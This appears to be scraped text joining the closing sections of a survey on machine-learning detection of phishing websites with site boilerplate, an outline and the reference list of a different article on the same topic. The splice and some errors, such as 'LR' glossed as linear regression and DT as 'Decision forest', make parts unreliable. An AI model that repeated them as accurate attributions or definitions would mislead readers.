Authors in Adebowale et al. [ 10 ] proposed a hybrid approach comprising Search and Heuristic Rule and Logistic Regression (SHLR) for efficient phishing attack detection. Authors proposed three steps approach: (1) the most of website shown in the result of a search query is legal if the web page domain matches the domain name of the websites retrieved in results against the query, (2) the heuristic rules defined by the character features (3) an ML model to predict the web page to be either a legal web page or a phishing attack. Authors in Patil et al. [ 53 ] used LR, DT, and RF techniques to detect a phishing attack, and they believe the RF is a much-improved way to detect the attack. The drawback of this system is detecting some minimal false-positive and false-negative results. Authors in Niranjan et al. [ 48 ] used the UCI dataset on phishing containing 6157 legitimate and 4898 phishing instances out of a total of 11,055 instances. The EKRV model was used that involves a combination of KNN and random committee techniques. Authors in Chiew et al. [ 19 ] used two datasets one from 5000 phishing web-pages based on URLs from PhishTank and second OpenPhish. Another 5000 legitimate web-pages were based on URLs from Alexa and the Common Crawl5 archive. They used Hybrid Ensemble Strategy. Authors in Pandey et al. [ 50 ] used a dataset from the Website phishing dataset, available online in a repository of the University of California. This dataset has 10 features and 1353 instances. They trained an RF-SVM hybrid model that achieved an accuracy of 94%.

Authors in Niranjan et al. [ 48 ] proposed an ensemble technique through the voting and stacking method. They selected the UCI ML phishing dataset and take only 23 features out of 30 features for further attack detection. Out of a total of 11,055 instances, the dataset has 6157 legitimate and 4898 phishing instances. They used the EKRV model to predict the phishing attack. Authors in Patil et al. [ 53 ] proposed a hybrid solution that uses three approaches: blacklist and whitelist, heuristics, and visual similarity. The proposed methodology monitors all traffic on the end-user system and compares each URL with the white list of trusted domains. The website analyzes various details for features. The three outcomes are suspicious websites, phishing websites, and legitimate websites. The ML classifier is used to collect data and to generate a score. If the score is greater than the threshold, then they marked the URL as a phishing attack and immediately blocked it. They used LR, DT, and RF to predict the accuracy of their test websites.

Authors in Jagadeesan et al. [ 33 ] utilized RF and SVM to detect phishing attacks. They used two types of datasets the first one is from the UCI machine learning repository which has 30 features. This dataset consists of 2456 entries of phishing and non-phishing URLs. The second dataset consists of 1353 URLs which has 10 features and three categories: Phishing, non-Phishing, and suspicious. Authors in Pandey et al. [ 50 ] used the dataset of a repository of the University of California. The dataset has 10 features and 1353 instances. They trained a hybrid model comprising RF and SVM which they utilize to predict the accuracy.

Phishing is a deceitful attempt to obtain sensitive data using social networking approaches, for example, usernames and passwords in an endeavor to deceive website users and getting their sensitive credentials [ 24 ]. Phishers prey on human emotion and the urge to follow instructions in a flow. Phishing is so omnipresent in the internet world that it has become a constant threat. In phishing, the biggest challenge is that the attackers are continuously devising new approaches to deceive clients such that they fall prey to their phishing traps.

A comparative study of previous works using different approaches is discussed in the above section with details. Machine learning based approaches, deep learning based approaches, scenario-based approaches, and hybrid techniques are deployed in past to tackle this problem. A detailed comparative analysis revealed that machine learning methods are the most frequently used and effective methods to detect a phishing attack. Different classification methods such as SVM, RF, ANN, C4.5, k-NN, DT have been used. Techniques with feature reduction give better performance. Classification is done through ELM, SVM, LR, C4.5, LC-ELM, kNN, XGB, and feature selection with ANOVA detected phishing attack with 99.2% accuracy, which is highest among all methods proposed so far but with trade-offs in terms of computational cost.

The RF method gives the best performance with the highest accuracy among any other classification methods on different datasets. Several studies proved that more than 95% attack detection accuracy can be achieved using a RF classification method. UCI machine learning dataset is the common dataset that has been used by researchers for phishing attack detection in past.

In various studies, the researchers also created a scenario-based environment to detect phishing attacks but these solutions are only applicable for a particular environment. Individual users in each organization exhibit different behaviors and individuals in the organization are sometimes aware of the scenarios. The hybrid learning approach is another way to detect phishing attacks as it occasionally gave better accuracy than that of a RF. Researchers are of the view that some ensemble models can further improve performance.

Nowadays phishing attacks defense is probably considered a hard job by system security experts. With low false positives, a feasible detection system should be there to identify phishing attacks. The defense approaches talked about so far are based on machine learning and deep learning algorithms. Besides having high computational costs, these methods have high false-positive rates; however, better at distinguishing phishing attacks. The machine learning techniques provide the best results when compared with other different approaches. The most effective defense for phishing attacks is an educated and well aware employee. But still, people are people with their built features of curiosity. They have a thirst to explore and know more. To mitigate the risks of falling victim to phishing tricks, organizations should try to keep employees away from their inherent core processes and make them develop a mindset that will abstain from clicking suspicious links and webpages.

Current practices and future challenges

A phishing attack is still considered a fascinating form of attack to lure a novice internet user to pass his/her private confidential data to the attackers. There are different measures available, yet at whatever point a solution is proposed to overcome these attacks, attackers consider the vulnerabilities of that solution to continue with their attacks. Several solutions to control phishing attacks have been proposed in past. A recent increase in the number of phishing attacks linked to COVID-19 performed between March 1 and March 23, 2020, and attacks performed on online collaboration tools (ZOOM, Microsoft Teams, etc.) has led researchers to pay more attention in this research domain. Most of the working be it at government or the corporate level, educational activities, businesses, as well as non-commercial activities, have switched online from the traditional on-premises approach. More users are relying on the web to perform their routine work. This has increased the importance of having a comprehensive phishing attack detection solution with better accuracy and better response time [ 6 – 8 ].

The conventional approaches for phishing attack detection are not accurate and can recognize only about 20% of phishing attacks. ML approaches give better results but with scalability trade-off and time-consuming even on the small-sized datasets. Phishing detection by heuristics techniques gives high false-positive rates. User cautiousness is a key requirement to prevent phishing attacks. Besides educating the client regarding safe browsing, some changes can be done in the user interfaces such as giving dynamic warnings and consequently identifying malicious emails. As the classified resources are accessible to the IoT gadgets, but their security architectures and features are not mature so far which makes them an exceptionally obvious target for the attackers.

Phishing is a door for all kinds of malware and ransomware. Malware attacks on organizations use ransomware and ransomware operators demand heavy amount as ransom in exchange for not disclosing stolen data which is a recent trend in 2020. Phishing scams in 2020 are deliberately impersonating COVID-19 and healthcare-related organizations and individuals by exploiting the unprepared users. It is better to safeguard doors at our ends and be proactive in defense rather than thinking about reactive strategies to combat once a phishing attack has happened.

Fake websites with phishing appear to be original but it is hard to identify as attackers imitate the appearance and functionality of real websites. Prevention is better than cure so there is a need for anti-phishing frameworks or plug-ins with web browsers. These plug-ins or frameworks may perform content filtering and identify as well as block suspected phishing websites to proceed further. An automated reporting feature can be added that can report phishing attacks to the organization from the user’s end such as a bank, government organization, etc. The time lost on remediation after a phishing attack can have a damaging impact on the productivity and profitability of businesses. In the current scenario, organizations need to provide their employees with awareness and feasible solutions to detect and report phishing attacks proactively and promptly before it causes any harm.

In the future, an all-inclusive phishing attack detection solution can be designed to identify, report, and block malicious web websites without the user’s involvement. If a website is asking for login credentials or sensitive information, a framework or smart web plug-in solution should be responsible to ensure the website is legitimate and inform the owner (organization, business, etc.) beforehand. Web pages health checking during user browsing has become a need of the time and a scalable, as well as a robust solution, is needed.

This survey enables researchers to comprehend the various methods, challenges, and trends for phishing attack detection. Nowadays, prevention from phishing attacks is considered a tough job in the system security domain. An efficient detection system ought to have the option to identify phishing attacks with low false positives. The protection strategies talked about in this paper are data mining and heuristics, ML, and deep learning algorithms. With high computational expenses, heuristic and data mining methods have high FP rates, however better at distinguishing phishing attacks. The ML procedures give the best outcomes when contrasted with different strategies. A portion of the ML procedures can identify TP up to 99%. As malicious URLs are created every other day and the attackers are using techniques to fool users and modify the URLs to attack. Nowadays deep learning and machine learning methods are used to detect a phishing attack. classification methods such as RF, SVM, C4.5, DT, PCA, k-NN are also common. These methods are most useful and effective for detecting the phishing attack. Future research can be done for a more scalable and robust method including the smart plugin solutions to tag/label if the website is legitimate or leading towards a phishing attack.

Abbreviations

SVM	Support vector machine
RF	Random forest
IBK	Instant base learner
ANN	Artificial neural network
RF	Rotation forest
DT	Decision forest
eDRI	Enhanced dynamic rule induction
LR	Linear regression
CART	Classification and regression tree
XGB	Extreme gradient boost
GBDT	Gradient boosting decision tree
AB	AdaBoost
NN	Neural-networks
GBM	Gradient boosting machine
GLM	Generalized linear model
NB	Navies Bayes
KNN	K-nearest neighbor
KS	K-star
LC-ELM	Combination extreme learning machine
ELM	Extreme learning machine
RC	Random committee
PCA	Principle component analysis

Biographies

is a student at the Department of Computer Science, Air University, Islamabad, Pakistan. He is currently pursuing his degree in Masters of Science in Computer Science from Air University, Islamabad, Pakistan. His current research interests include but are not limited to cyber security, artificial intelligence, computer vision, network security, IoT, smart city, and application development for smart living. He aims to contribute to interdisciplinary research of computer science and human-related disciplines.

is a student at the Department of Computer Science, Air University, Islamabad, Pakistan. She is currently pursuing his degree in Masters of Science in Computer Science from Air University, Islamabad, Pakistan. Her current research interests include but are not limited to cyber security, artificial intelligence, computer vision, network security, IoT, smart city, and application development for smart living.

(MIEEE’17) graduated from Shandong University, China, and received M.S. degree from Wuhan Polytechnic University, China and Ph.D. degree in computer science and engineering from Southeast University, China. Since 2020, he joined Yangzhou University, China. He is serving as an Advisory Editor of Wiley Engineering Reports, an Associate Editor of Springer Telecommunication Systems, IET Smart Cities, Taylor and Francis International Journal of Computers and Applications and KeAi International Journal of Intelligent Networks, an Area Editor of EAI Endorsed Transactions on Internet of Things, the Lead Guest Editor of Elsevier Internet of Things, Wiley Transactions on Emerging Telecommunications Technologies and Wiley Internet Technology Letters, and the Chair of CollaborateCom 2020 workshop. He served(s) as a TPC Member of ACM MobiCom 2020 workshop, IEEE INFOCOM 2020 workshop, IEEE ICC 2021/2020/2019, IEEE GlobeCom 2020/2019, IEEE WCNC 2021, IFIP/IEEE IM 2021, IEEE PIMRC 2020/2019, IEEE MSN 2020, IEEE VTC 2020/2019/2018, IEEE ICIN2020, IEEE GIIS 2020, IEEE DASC 2019, APNOMS 2020/2019, AdHoc-Now2020, FNC 2020/2019, EAI CollaborateCom 2020/2019, and EAI ChinaCom 2019, etc. Furthermore, he served as a Reviewer for 20+ reputable conferences/journals including IEEE INFOCOM, IEEE ICC, IEEE GlobeCom, IEEE WCNC, IEEE PIMRC, IEEE COMMAG, IEEE TII, IEEE IoT, IEEE CL, Elsevier JNCA, Elsevier FGCS, Springer WINE, Springer TELS, IET SMC, EAI CollaborateCom, and Wiley IJCS, etc. His main research interests focus on UAVs-enabled collaborative networking techniques.

Abdul Rehman Javed

is currently a lecturer at the Department of Cyber Security, Air University, Islamabad, Pakistan. He worked with National Cyber Crimes and Forensics Laboratory, Air University, Islamabad, Pakistan. He received his Master’s degree in Computer Science from the National University of Computer and Emerging Sciences, Islamabad, Pakistan and bachelor’s degree in Computer Science from the COMSATS university Islamabad (Sahiwal campus). He is a reviewer of many well-known journals, including, Sustainable cities and society (Elsevier), Journal of Information Security and Applications (Elsevier), IEEE Internet of Things Magazine, Transactions on Internet Technology (ACM), Telecommunication Systems (Springer), IEEE Access and International Journal of Ad Hoc and Ubiquitous Computing (Inderscience). His current research interests include but are not limited to mobile and ubiquitous computing, data analysis, knowledge discovery, data mining, natural language processing, smart homes, and their applications in human activity analysis, human motion analysis, and e-health. He aims to contribute to interdisciplinary research of computer science and human-related disciplines. He has authored more than over 10 peer–reviewed articles on topics related to cybersecurity, mobile computing, and digital forensics.

is currently engaged as faculty with the Department of Cyber Security, Faculty of Computing and Artificial Intelligence and as an investigator with National Cybercrimes and Forensics Laboratory, Air University, Islamabad, Pakistan. She earned her PhD degree in Computer Science from FAST National University of Computer and Emerging Sciences, Islamabad, Pakistan in 2010 winning scholarship from Higher Education Commission of Pakistan. She has been working as faculty with International Islamic University, Islamabad; Iqra University, Islamabad; and Saudi Electronic University, Riyadh, Saudi Arabia since then. She is reviewer and editor of multiple renowned international journals in computing and cyber security domain. She has delivered guest talks at numerous national and international forums in past. Her current research interests include but are not limited to computer forensics, cyber-attacks detection using deep learning, intelligent systems, criminal profiling, and data privacy protection.

received the Ph. D. degree in cyber security from Liverpool John Moores University, Liverpool, U.K., in 2008. He is currently a Professor and the Chair of the Cyber Security Department, Air University, Islamabad, Pakistan. He is highly skilled in Machine Learning, Matlab, Deep Learning, Algorithms, Big Data Analytics, Data Science, C++, Python, R, and LaTeX. Being a part of National Center of Cyber Security, he is highly engaged in Mobile forensics.

Publisher's Note

Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.

Contributor Information

Abdul Basit, Email: kp.ude.ua.stneduts@662171 .

Maham Zafar, Email: kp.ude.ua.stneduts@172171 .

Xuan Liu, Email: nc.ude.uzy@fusuy .

Abdul Rehman Javed, Email: [email protected] .

Zunera Jalil, Email: [email protected] .

Kashif Kifayat, Email: [email protected] .

Information

Author Services

Initiatives

You are accessing a machine-readable page. In order to be human-readable, please install an RSS reader.

All articles published by MDPI are made immediately available worldwide under an open access license. No special permission is required to reuse all or part of the article published by MDPI, including figures and tables. For articles published under an open access Creative Common CC BY license, any part of the article may be reused without permission provided that the original article is clearly cited. For more information, please refer to https://www.mdpi.com/openaccess .

Feature papers represent the most advanced research with significant potential for high impact in the field. A Feature Paper should be a substantial original Article that involves several techniques or approaches, provides an outlook for future research directions and describes possible research applications.

Feature papers are submitted upon individual invitation or recommendation by the scientific editors and must receive positive feedback from the reviewers.

Editor’s Choice articles are based on recommendations by the scientific editors of MDPI journals from around the world. Editors select a small number of articles recently published in the journal that they believe will be particularly interesting to readers, or important in the respective research area. The aim is to provide a snapshot of some of the most exciting work published in the various research areas of the journal.

Original Submission Date Received: .

Active Journals
Find a Journal
Proceedings Series
For Authors
For Reviewers
For Editors
For Librarians
For Publishers
For Societies
For Conference Organizers
Open Access Policy
Institutional Open Access Program
Special Issues Guidelines
Editorial Process
Research and Publication Ethics
Article Processing Charges
Testimonials
Preprints.org
SciProfiles
Encyclopedia

Article Menu

Subscribe SciFeed
Recommended Articles
Google Scholar
on Google Scholar
Table of Contents

Find support for a specific problem in the support section of our website.

Please let us know what you think of our products and services.

Visit our dedicated information section to learn more about MDPI.

JSmol Viewer

Detecting phishing domains using machine learning.

1. Introduction

2. background, 2.1. decision tree, 2.2. random forest, 2.3. support vector machine, 2.4. ensemble classification techniques, 2.4.1. bagging.

Click here to enlarge figure

2.4.2. Boosting

2.4.3. stacking, 2.5. ensemble classification techniques, 3. related work, 4. methodology, 4.1. dataset used: uci phishing websites, 4.2. implemented algorithm, 5. model’s flowchart.

Read the URL’s UCI phishing websites dataset.
Check the data features.
Check the proposed data types.
Clean missing values from the data.
Split the data into training and testing sets.
Train the model using four machine-learning techniques: RF, SVM, DT, and ANN.
Evaluate the model’s performance to estimate the accuracy and calculate the accuracy results.
Select the best model as the final model.

6. Findings and Analysis

7. conclusions and future works, author contributions, institutional review board statement, informed consent statement, data availability statement, conflicts of interest.

Cabaj, K.; Domingos, D.; Kotulski, Z.; Respício, A. Cybersecurity Education: Evolution of the Discipline and Analysis of Master Programs. Comput. Secur. 2018 , 75 , 24–35. [ Google Scholar ] [ CrossRef ]
Iwendi, C.; Jalil, Z.; Javed, A.R.; Reddy, G.T.; Kaluri, R.; Srivastava, G.; Jo, O. KeySplitWatermark: Zero Watermarking Algorithm for Software Protection Against Cyber-Attacks. IEEE Access 2020 , 8 , 72650–72660. [ Google Scholar ] [ CrossRef ]
Rehman Javed, A.; Jalil, Z.; Atif Moqurrab, S.; Abbas, S.; Liu, X. Ensemble Adaboost Classifier for Accurate and Fast Detection of Botnet Attacks in Connected Vehicles. Trans. Emerg. Telecommun. Technol. 2020 , 33 , e4088. [ Google Scholar ] [ CrossRef ]
Conklin, W.A.; Cline, R.E.; Roosa, T. Re-Engineering Cybersecurity Education in the US: An Analysis of the Critical Factors. In Proceedings of the 2014 47th Hawaii International Conference on System Sciences, IEEE, Waikoloa, HI, USA, 6–9 January 2014; pp. 2006–2014. [ Google Scholar ]
Javed, A.R.; Usman, M.; Rehman, S.U.; Khan, M.U.; Haghighi, M.S. Anomaly Detection in Automated Vehicles Using Multistage Attention-Based Convolutional Neural Network. IEEE Trans. Intell. Transp. Syst. 2021 , 22 , 4291–4300. [ Google Scholar ] [ CrossRef ]
Mittal, M.; Iwendi, C.; Khan, S.; Rehman Javed, A. Analysis of Security and Energy Efficiency for Shortest Route Discovery in Low-energy Adaptive Clustering Hierarchy Protocol Using Levenberg-Marquardt Neural Network and Gated Recurrent Unit for Intrusion Detection System. Trans. Emerg. Telecommun. Technol. 2020 , 32 , e3997. [ Google Scholar ] [ CrossRef ]
Bleau, H.; Global Fraud and Cybercrime Forecast. Retrieved RSA 2017. Available online: https://www.rsa.com/en-us/resources/2017-global-fraud (accessed on 19 November 2021).
Computer Fraud & Security. APWG: Phishing Activity Trends Report Q4 2018. Comput. Fraud Secur. 2019 , 2019 , 4. [ Google Scholar ] [ CrossRef ]
Hulten, G.J.; Rehfuss, P.S.; Rounthwaite, R.; Goodman, J.T.; Seshadrinathan, G.; Penta, A.P.; Mishra, M.; Deyo, R.C.; Haber, E.J.; Snelling, D.A.W. Finding Phishing Sites ; Google Patents: Microsoft Corporation, Redmond, WA, USA, 2014. [ Google Scholar ]
What Is Phishing and How to Spot a Potential Phishing Attack. PsycEXTRA Dataset. Available online: https://www.imperva.com/learn/application-security/phishing-attack-scam/ (accessed on 20 November 2021).
Gupta, B.B.; Tewari, A.; Jain, A.K.; Agrawal, D.P. Fighting against Phishing Attacks: State of the Art and Future Challenges. Neural Comput. Appl. 2016 , 28 , 3629–3654. [ Google Scholar ] [ CrossRef ]
Zhu, E.; Ju, Y.; Chen, Z.; Liu, F.; Fang, X. DTOF-ANN: An Artificial Neural Network Phishing Detection Model Based on Decision Tree and Optimal Features. Appl. Soft Comput. 2020 , 95 , 106505. [ Google Scholar ] [ CrossRef ]
Machine Learning Decision Tree Classification Algorithm—Javatpoint. Available online: https://www.javatpoint.com/machine-learning-decision-tree-classification-algorithm (accessed on 25 November 2021).
Breiman, L. Random Forests. Mach. Learn. 2001 , 45 , 5–32. [ Google Scholar ] [ CrossRef ] [ Green Version ]
Friedman, J.H. The Elements of Statistical Learning: Data Mining, Inference, and Prediction ; Springer Open: Berlin/Heidelberg, Germany, 2017. [ Google Scholar ]
Brownlee, J. Train-Test Split for Evaluating Machine Learning Algorithms. Mach. Learn. Mastery 2020 , 23 . Available online: https://machinelearningmastery.com/train-test-split-for-evaluating-machine-learning-algorithms/ (accessed on 25 December 2021).
Subasi, A.; Molah, E.; Almkallawi, F.; Chaudhery, T.J. Intelligent Phishing Website Detection Using Random Forest Classifier. In Proceedings of the 2017 International Conference on Electrical and Computing Technologies and Applications (ICECTA), Ras Al Khaimah, United Arab Emirates, 21–23 November 2017; pp. 1–5. [ Google Scholar ]
Jeremybeauchamp English: A Visual Comparison between the Complexity of Decision Trees and Random Forests. 2020. Available online: https://commons.wikimedia.org/wiki/File:Decision_Tree_vs._Random_Forest.png (accessed on 27 December 2021).
Sönmez, Y.; Tuncer, T.; Gökal, H.; Avcı, E. Phishing Web Sites Features Classification Based on Extreme Learning Machine. In Proceedings of the 2018 6th International Symposium on Digital Forensic and Security (ISDFS), IEEE, Antalya, Turkey, 22–25 March 2018; pp. 1–5. [ Google Scholar ]
ResearchGate. Figure 2. Classification of Data by Support Vector Machine (SVM). Available online: https://www.researchgate.net/figure/Classification-of-data-by-support-vector-machine-SVM_fig8_304611323 (accessed on 6 October 2021).
Cristianini, N.; Shawe-Taylor, J. An Introduction to Support Vector Machines and Other Kernel-Based Learning Methods ; Cambridge University Press: Cambridge, UK, 2000. [ Google Scholar ]
Gomes, H.M.; Barddal, J.P.; Enembreck, F.; Bifet, A. A Survey on Ensemble Learning for Data Stream Classification. ACM Comput. Surv. CSUR 2017 , 50 , 1–36. [ Google Scholar ] [ CrossRef ]
Zhou, Z.-H. Ensemble Methods: Foundations and Algorithms ; Chapman and Hall/CRC: London, UK, 2019; ISBN 1-4398-3005-3. [ Google Scholar ]
Yaman, E.; Subasi, A. Comparison of Bagging and Boosting Ensemble Machine Learning Methods for Automated EMG Signal Classification. BioMed Res. Int. 2019 , 2019 , 9152506. [ Google Scholar ] [ CrossRef ]
Bagging (Bootstrap Aggregation)—Overview, How It Works, Advantages—Ro.Outletshop2021.Ru. Available online: https://corporatefinanceinstitute.com/resources/data-science/bagging-bootstrap-aggregation/#:~:text=Bagging%20offers%20the%20advantage%20of,of%20interpretability%20of%20a%20model. (accessed on 6 October 2021).
Junior, J.R.B.; do Carmo Nicoletti, M. An Iterative Boosting-Based Ensemble for Streaming Data Classification. Inf. Fusion 2019 , 45 , 66–78. [ Google Scholar ] [ CrossRef ]
Zhou, Z.-H. Ensemble Learning. In Machine Learning ; Springer: Berlin/Heidelberg, Germany, 2021; pp. 181–210. [ Google Scholar ]
AdaBoost Classifier in Python—DataCamp. Available online: https://www.datacamp.com/tutorial/adaboost-classifier-python (accessed on 6 October 2021).
Abiodun, O.I.; Jantan, A.; Omolara, A.E.; Dada, K.V.; Mohamed, N.A.; Arshad, H. State-of-the-Art in Artificial Neural Network Applications: A Survey. Heliyon 2018 , 4 , e00938. [ Google Scholar ] [ CrossRef ] [ Green Version ]
McCulloch, W.S.; Pitts, W. A Logical Calculus of the Ideas Immanent in Nervous Activity. Bull. Math. Biophys. 1943 , 5 , 115–133. [ Google Scholar ] [ CrossRef ]
Jin, D.; Wang, P.; Bai, Z.; Wang, X.; Peng, H.; Qi, R.; Yu, Z.; Zhuang, G. Analysis of Bacterial Community in Bulking Sludge Using Culture-Dependent and-Independent Approaches. J. Environ. Sci. 2011 , 23 , 1880–1887. [ Google Scholar ] [ CrossRef ] [ PubMed ]
Liu, Z.-W.; Liang, F.-N.; Liu, Y.-Z. Artificial Neural Network Modeling of Biosorption Process Using Agricultural Wastes in a Rotating Packed Bed. Appl. Therm. Eng. 2018 , 140 , 95–101. [ Google Scholar ] [ CrossRef ]
Oliveira, V.; Sousa, V.; Dias-Ferreira, C. Artificial Neural Network Modelling of the Amount of Separately-Collected Household Packaging Waste. J. Clean. Prod. 2019 , 210 , 401–409. [ Google Scholar ] [ CrossRef ]
Basit, A.; Zafar, M.; Liu, X.; Javed, A.R.; Jalil, Z.; Kifayat, K. A Comprehensive Survey of AI-Enabled Phishing attacks detection techniques. Telecommun. Syst. 2021 , 76 , 139–154. Available online: https://link.springer.com/article/10.1007/s11235-020-00733-2 (accessed on 27 September 2021). [ CrossRef ]
A Comprehensive Guide to Understand and Implement Text Classification in Python. Anal. Vidhya 2018 . Available online: http://www.shivambansal.com/blog/text-classification-guide/ (accessed on 25 October 2021).
Sánchez-Paniagua, M.; Fernández, E.F.; Alegre, E.; Al-Nabki, W.; González-Castro, V. Phishing URL Detection: A Real-Case Scenario Through Login URLs. IEEE Access 2022 , 10 , 42949–42960. [ Google Scholar ] [ CrossRef ]
James, J.; Sandhya, L.; Thomas, C. Detection of Phishing URLs Using Machine Learning Techniques. In Proceedings of the 2013 International Conference on Control Communication and Computing (ICCC), Thiruvananthapuram, India, 13–15 December 2013; Available online: https://ieeexplore.ieee.org/abstract/document/6731669 (accessed on 26 September 2021).
Liew, S.W.; Sani NF, M.; Abdullah, M.T.; Yaakob, R.; Sharum, M.Y. An Effective Security Alert Mechanism for Real-Time Phishing Tweet Detection on Twitter—ScienceDirect. Comput. Secur. 2019 , 83 , 201–207. Available online: https://www.sciencedirect.com/science/article/pii/S0167404818309040 (accessed on 26 September 2021). [ CrossRef ]
Hutchinson, S.; Zhang, Z.; Liu, Q. Detecting Phishing Websites with Random Forest. In Proceedings of the Machine Learning and Intelligent Communications, Hangzhou, China, 6–8 July 2018; Meng, L., Zhang, Y., Eds.; Springer International Publishing: Cham, Switzerland, 2018; pp. 470–479. [ Google Scholar ]
Patil, V.; Thakkar, P.; Shah, C.; Bhat, T.; Godse, S.P. Detection and Prevention of Phishing Websites Using Machine Learning Approach. In Proceedings of the 2018 Fourth International Conference on Computing Communication Control and Automation (ICCUBEA), Pune, India, 19–18 August 2018; pp. 1–5. [ Google Scholar ]
Joshi, A.; Pattanshetti, P.T.R. Phishing Attack Detection Using Feature Selection Techniques ; Social Science Research Network: Rochester, NY, USA, 2019. [ Google Scholar ]
Ubing, A.; Kamilia, S.; Abdullah, A.; Zaman, N.; Supramaniam, M. Phishing Website Detection: An Improved Accuracy through Feature Selection and Ensemble Learning. Int. J. Adv. Comput. Sci. Appl. 2019 , 10 , 252–257. [ Google Scholar ] [ CrossRef ] [ Green Version ]
Li, Y.; Yang, Z.; Chen, X.; Yuan, H.; Liu, W. A Stacking Model Using URL and HTML Features for Phishing Webpage Detection. Future Gener. Comput. Syst. 2019 , 94 , 27–39. [ Google Scholar ] [ CrossRef ]
Zamir, A.; Khan, H.U.; Iqbal, T.; Yousaf, N.; Aslam, F.; Anjum, A.; Hamdani, M. Phishing Web Site Detection Using Diverse Machine Learning Algorithms. Electron. Libr. 2020 , 38 , 65–80. [ Google Scholar ] [ CrossRef ]
Alsariera, Y.A.; Adeyemo, V.E.; Balogun, A.O.; Alazzawi, A.K. AI Meta-Learners and Extra-Trees Algorithm for the Detection of Phishing Websites. IEEE Access 2020 , 8 , 142532–142542. [ Google Scholar ] [ CrossRef ]
Ali, W.; Malebary, S. Particle Swarm Optimization-Based Feature Weighting for Improving Intelligent Phishing Website Detection. IEEE Access 2020 , 8 , 116766–116780. [ Google Scholar ] [ CrossRef ]
Adebowale, M.A.; Lwin, K.T.; Sanchez, E.; Hossain, M.A. Intelligent Web-Phishing Detection and Protection Scheme Using Integrated Features of Images, Frames and Text—ScienceDirect. Expert Syst. Appl. 2019 , 115 , 300–313. Available online: https://www.sciencedirect.com/science/article/abs/pii/S0957417418304925 (accessed on 26 September 2021). [ CrossRef ] [ Green Version ]
El Aassal, A.; Baki, S.; Das, A.; Verma, R.M. An In-Depth Benchmarking and Evaluation of Phishing Detection Research for Security Needs. IEEE Access 2020 , 8 , 22170–22192. Available online: https://ieeexplore.ieee.org/abstract/document/8970564 (accessed on 27 September 2021). [ CrossRef ]
Subasi, A.; Kremic, E. Comparison of Adaboost with MultiBoosting for Phishing Website Detection—ScienceDirect. Procedia Comput. Sci. 2020 , 168 , 272–278. Available online: https://www.sciencedirect.com/science/article/pii/S1877050920303902 (accessed on 27 September 2021). [ CrossRef ]
Mao, J.; Bian, J.; Tian, W.; Zhu, S.; Wei, T.; Li, A.; Liang, Z. Phishing Page Detection via Learning Classifiers from Page Layout Feature. EURASIP J. Wirel. Commun. Netw. 2019 , 2019 , 43. Available online: https://jwcn-eurasipjournals.springeropen.com/articles/10.1186/s13638-019-1361-0 (accessed on 27 September 2021). [ CrossRef ] [ Green Version ]
A Novel Machine Learning Approach to Detect Phishing Websites. Available online: https://ieeexplore.ieee.org/abstract/document/8474040/ (accessed on 27 September 2021).
Chen, Y.H.; Chen, J.L. AI@ntiPhish—Machine Learning Mechanisms for Cyber-Phishing Attack. IEICE Trans. Inf. Syst. 2019 , 102 , 878–887. Available online: https://www.jstage.jst.go.jp/article/transinf/E102.D/5/E102.D_2018NTI0001/_article/-char/ja/ (accessed on 27 September 2021). [ CrossRef ] [ Green Version ]
Abdelhamid, N.; Thabtah, F.; Abdel-Jaber, H. Phishing Detection: A Recent Intelligent Machine Learning Comparison Based on Models Content and Features. In Proceedings of the 2017 IEEE International Conference on Intelligence and Security Informatics, Beijing, China, 22–24 July 2017; Available online: https://ieeexplore.ieee.org/abstract/document/8004877 (accessed on 27 September 2021).
Jain, A.K.; Gupta, B.B. Towards Detection of Phishing Websites on Client-Side Using Machine Learning Based Approach. Telecommun. Syst. 2018 , 68 , 687–700. Available online: https://link.springer.com/article/10.1007/s11235-017-0414-0 (accessed on 27 September 2021). [ CrossRef ]
Lakshmi, L.; Reddy, M.P.; Santhaiah, C.; Reddy, U.J. Smart Phishing Detection in Web Pages Using Supervised Deep Learning Classification and Optimization Technique ADAM. Wirel. Pers. Commun. 2021 , 118 , 3549–3564. [ Google Scholar ] [ CrossRef ]
Sahingoz, O.K.; Buber, E.; Demir, O.; Diri, B. Machine Learning Based Phishing Detection from URLs—ScienceDirect. Expert Syst. Appl. 2019 , 117 , 345–357. Available online: https://www.sciencedirect.com/science/article/abs/pii/S0957417418306067 (accessed on 27 September 2021). [ CrossRef ]
Jagadeesan, S. URL Phishing Analysis Using Random Forest. Int. J. Pure Appl. Math. 2018 , 118 , 4159–4163. [ Google Scholar ]
Niranjan, A.; Haripriya, D.K.; Pooja, R.; Sarah, S.; Deepa Shenoy, P.; Venugopal, K.R. EKRV: Ensemble of KNN and Random Committee Using Voting for Efficient Classification of Phishing ; Springer: Singapore, 2019; Available online: https://link.springer.com/chapter/10.1007/978-981-13-1708-8_37 (accessed on 27 September 2021).
Chiew, K.L.; Tan, C.L.; Wong, K.; Yong, K.S.; Tiong, W.K. A New Hybrid Ensemble Feature Selection Framework for Machine Learning-Based Phishing Detection System—ScienceDirect. Inf. Sci. 2019 , 484 , 153–166. Available online: https://www.sciencedirect.com/science/article/abs/pii/S0020025519300763 (accessed on 27 September 2021). [ CrossRef ]
Pandey, A.; Gill, N.; Sai Prasad Nadendla, K.; Thaseen, I.S. Identification of Phishing Attack in Websites Using Random Forest-SVM Hybrid Model. In Proceedings of the Intelligent Systems Design and Applications: 18th International Conference on Intelligent Systems Design and Applications (ISDA 2018), Vellore, India, 6–8 December 2018; Springer International Publishing: Midtown Manhattan, NY, USA, 2020. Available online: https://link.springer.com/chapter/10.1007/978-3-030-16660-1_12 (accessed on 27 September 2021).
Ali, W.; Ahmed, A.A. Hybrid Intelligent Phishing Website Prediction Using Deep Neural Networks with Genetic Algorithm-Based Feature Selection and Weighting. IET Inf. Secur. 2019 , 13 , 659–669. [ Google Scholar ] [ CrossRef ]
Aljofey, A.; Jiang, Q.; Qu, Q.; Huang, M.; Niyigena, J.P. An Effective Phishing Detection Model Based on Character Level Convolutional Neural Network from URL. Electronics 2020 , 9 , 1514. Available online: https://www.mdpi.com/2079-9292/9/9/1514 (accessed on 27 September 2021). [ CrossRef ]
Shie, E.W.S. Critical Analysis of Current Research Aimed at Improving Detection of Phishing Attacks. Sel. Comput. Res. Pap. 2020 , 45 , 45–53. [ Google Scholar ]
Maurya, S.; Jain, A. Deep Learning to Combat Phishing. J. Stat. Manag. Syst. 2020 , 23 , 945–957. [ Google Scholar ] [ CrossRef ]
